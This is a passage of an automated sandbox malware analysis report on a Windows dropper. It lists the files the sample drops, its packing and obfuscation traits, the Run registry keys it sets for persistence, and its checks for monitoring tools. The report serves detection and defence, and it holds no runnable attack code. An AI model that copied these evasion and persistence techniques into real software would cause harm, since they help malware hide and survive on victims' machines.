Source: Binary string: \??\C:\Windows\exe\applaunch.pdb; source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.00000000052A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: webauthn.pdbGCTL source: firefox.exe, 0000001C.00000003.2801056711.000001DEEBF8E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: a6f0d09f38.exe, 0000000D.00000003.2893559626.00000000084E0000.00000004.00001000.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2987390171.00000000063D2000.00000040.00000800.00020000.00000000.sdmp, 8b82d73f70.exe, 00000020.00000002.2915080351.00000000003A2000.00000040.00000001.01000000.0000001A.sdmp, 8b82d73f70.exe, 00000020.00000003.2780938560.00000000050C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: mscorlib.pdbamD source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n4C:\Windows\applaunch.pdbd source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\applaunch.pdb]qKeyT source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: o.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: applaunch.pdbeP/ source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: applaunch.pdblaunch.pdbpdbnch.pdb.0.30319\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: symbols\exe\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb, source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbs1 source: AppLaunch.exe, 00000008.00000002.2944711279.00000000052A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdbU source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: oC:\Windows\Microsoft.NET\Framework\v4.0.30319\applaunch.pdbxX($ source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: %%.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbV source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .PDB source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.PDBp source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.700000.0.unpack :EW;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.6e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.6e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.6e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Unpacked PE file: 13.2.a6f0d09f38.exe.600000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bioduybg:EW;eaqvzvci:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bioduybg:EW;eaqvzvci:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Unpacked PE file: 14.2.b5da647ae3.exe.2c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sqwnkuay:EW;dlrscmkp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sqwnkuay:EW;dlrscmkp:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Unpacked PE file: 32.2.8b82d73f70.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W;xbmfzvhb:EW;ztggrlpz:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Unpacked PE file: 34.2.98a7b9f337.exe.e60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jyijtabb:EW;ckbvpooz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jyijtabb:EW;ckbvpooz:EW;.taggant:EW;
.NET source code contains method to dynamically call methods (often used by packers)
Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FilteredInspector.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
.NET source code contains potential unpacker
Source: 7.2.SxQyhJr.exe.6300000.4.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 7.2.SxQyhJr.exe.6300000.4.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 7.2.SxQyhJr.exe.6300000.4.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 7.2.SxQyhJr.exe.6300000.4.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 7.2.SxQyhJr.exe.6300000.4.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FieldCalculator.cs .Net Code: CalculateInterruptibleCalculator System.AppDomain.Load(byte[])
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Yara detected Costura Assembly Loader
Source: Yara match File source: 7.2.SxQyhJr.exe.6240000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2452245090.0000000006240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SxQyhJr.exe PID: 7396, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 2720, type: MEMORYSTR
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: SxQyhJr[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x16d4cc
Source: random[1].exe.6.dr Static PE information: real checksum: 0x1c9b3a should be: 0x1c9ff1
Source: SxQyhJr.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x16d4cc
Source: random[1].exe2.6.dr Static PE information: real checksum: 0x2a3ab9 should be: 0x2a70e2
Source: 98a7b9f337.exe.6.dr Static PE information: real checksum: 0x44720a should be: 0x446939
Source: a6f0d09f38.exe.6.dr Static PE information: real checksum: 0x1c9b3a should be: 0x1c9ff1
Source: file.exe Static PE information: real checksum: 0x1d9764 should be: 0x1e1ec7
Source: b5da647ae3.exe.6.dr Static PE information: real checksum: 0x1ce583 should be: 0x1c9bf3
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1d9764 should be: 0x1e1ec7
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x1ce583 should be: 0x1c9bf3
Source: random[2].exe.6.dr Static PE information: real checksum: 0x44720a should be: 0x446939
Source: 8b82d73f70.exe.6.dr Static PE information: real checksum: 0x2a3ab9 should be: 0x2a70e2
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: egarwnqv
Source: file.exe Static PE information: section name: kktuolht
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: egarwnqv
Source: skotes.exe.0.dr Static PE information: section name: kktuolht
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: .idata
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: jyijtabb
Source: random[2].exe.6.dr Static PE information: section name: ckbvpooz
Source: random[2].exe.6.dr Static PE information: section name: .taggant
Source: 98a7b9f337.exe.6.dr Static PE information: section name:
Source: 98a7b9f337.exe.6.dr Static PE information: section name: .idata
Source: 98a7b9f337.exe.6.dr Static PE information: section name:
Source: 98a7b9f337.exe.6.dr Static PE information: section name: jyijtabb
Source: 98a7b9f337.exe.6.dr Static PE information: section name: ckbvpooz
Source: 98a7b9f337.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: bioduybg
Source: random[1].exe.6.dr Static PE information: section name: eaqvzvci
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: a6f0d09f38.exe.6.dr Static PE information: section name:
Source: a6f0d09f38.exe.6.dr Static PE information: section name: .idata
Source: a6f0d09f38.exe.6.dr Static PE information: section name:
Source: a6f0d09f38.exe.6.dr Static PE information: section name: bioduybg
Source: a6f0d09f38.exe.6.dr Static PE information: section name: eaqvzvci
Source: a6f0d09f38.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: sqwnkuay
Source: random[1].exe0.6.dr Static PE information: section name: dlrscmkp
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: b5da647ae3.exe.6.dr Static PE information: section name:
Source: b5da647ae3.exe.6.dr Static PE information: section name: .idata
Source: b5da647ae3.exe.6.dr Static PE information: section name:
Source: b5da647ae3.exe.6.dr Static PE information: section name: sqwnkuay
Source: b5da647ae3.exe.6.dr Static PE information: section name: dlrscmkp
Source: b5da647ae3.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: random[1].exe2.6.dr Static PE information: section name: xbmfzvhb
Source: random[1].exe2.6.dr Static PE information: section name: ztggrlpz
Source: random[1].exe2.6.dr Static PE information: section name: .taggant
Source: 8b82d73f70.exe.6.dr Static PE information: section name:
Source: 8b82d73f70.exe.6.dr Static PE information: section name: .idata
Source: 8b82d73f70.exe.6.dr Static PE information: section name: xbmfzvhb
Source: 8b82d73f70.exe.6.dr Static PE information: section name: ztggrlpz
Source: 8b82d73f70.exe.6.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_050F03E2 push cs; ret 0_2_050F03F3
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_006FD91C push ecx; ret 6_2_006FD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00989680 push ebp; mov dword ptr [esp], 757EDB71h 6_2_009896AF
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00989680 push edi; mov dword ptr [esp], 57E939DFh 6_2_00989703
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00989680 push eax; mov dword ptr [esp], esi 6_2_0098973C
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00989680 push ecx; mov dword ptr [esp], edi 6_2_00989783
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_0158E988 push esp; retf 7_2_0158E9A6
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_0158EE80 pushfd ; retf 7_2_0158EE81
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061E8658 push 00000037h; ret 7_2_061E865F
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061E9E48 push es; iretd 7_2_061E9E58
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061E7E94 push FFFFFF90h; retf 7_2_061E7E9D
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061E7F7C push E803FE7Bh; ret 7_2_061E7F81
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061E93C4 push es; ret 7_2_061E93C8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F9CE9 push es; ret 7_2_061F9CEC
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061FB560 push es; retf 7_2_061FB57C
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06539F26 push es; iretd 7_2_06539F28
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06534C66 push es; retf 7_2_06534CA0
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_065310FC push eax; retf 7_2_06531103
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06534CA1 push es; retf 7_2_06534CA4
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_065365EA push es; retf 7_2_06536650
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_066364FA push ebx; iretd 7_2_0663650A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063DE886 push edi; mov dword ptr [esp], 2ED07954h 13_2_063DE820
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063DE886 push edi; mov dword ptr [esp], eax 13_2_063DEE07
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063DE886 push edx; mov dword ptr [esp], ebx 13_2_063DEE13
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063DE886 push eax; mov dword ptr [esp], 7B0CE75Ah 13_2_063DF2C5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063DE886 push ecx; mov dword ptr [esp], esi 13_2_063DF407
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E1639 push eax; mov dword ptr [esp], 3EF51D66h 13_2_063E232F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E0E2C push 1C38B7BDh; mov dword ptr [esp], esi 13_2_063E0E3A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E0E2C push eax; mov dword ptr [esp], 3D4032C1h 13_2_063E0E3E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E0E2C push ecx; mov dword ptr [esp], 4E53CE1Bh 13_2_063E21B0
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E460F push 038564DAh; mov dword ptr [esp], edx 13_2_063E4626
Source: file.exe Static PE information: section name: entropy: 7.980771158039659
Source: file.exe Static PE information: section name: egarwnqv entropy: 7.954289252151083
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.980771158039659
Source: skotes.exe.0.dr Static PE information: section name: egarwnqv entropy: 7.954289252151083
Source: random[2].exe.6.dr Static PE information: section name: jyijtabb entropy: 7.954103030134678
Source: SxQyhJr[1].exe.6.dr Static PE information: section name: .text entropy: 7.945671182559719
Source: 98a7b9f337.exe.6.dr Static PE information: section name: jyijtabb entropy: 7.954103030134678
Source: SxQyhJr.exe.6.dr Static PE information: section name: .text entropy: 7.945671182559719
Source: random[1].exe.6.dr Static PE information: section name: entropy: 7.969899728729919
Source: random[1].exe.6.dr Static PE information: section name: bioduybg entropy: 7.952935716114438
Source: a6f0d09f38.exe.6.dr Static PE information: section name: entropy: 7.969899728729919
Source: a6f0d09f38.exe.6.dr Static PE information: section name: bioduybg entropy: 7.952935716114438
Source: random[1].exe0.6.dr Static PE information: section name: sqwnkuay entropy: 7.954864550900061
Source: b5da647ae3.exe.6.dr Static PE information: section name: sqwnkuay entropy: 7.954864550900061
Source: random[1].exe2.6.dr Static PE information: section name: entropy: 7.764448278674302
Source: 8b82d73f70.exe.6.dr Static PE information: section name: entropy: 7.764448278674302
Source: 7.2.SxQyhJr.exe.5a60000.2.raw.unpack, asXkdacxwMNyu0Oyerq.cs High entropy of concatenated method names: 'NTwZu9ZRgC', 'icGyu4GKsds5wJKvHYY', 'cTCRSxGtnAXV86jeErZ', 'I6XQDo3yO8mwH4krEjW', 'uhBHhL3AmI1h0DwFiAR'
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8b82d73f70.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a6f0d09f38.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b5da647ae3.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6e1fbaaba5.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Window searched: window name: PROCMON_WINDOW_CLASS
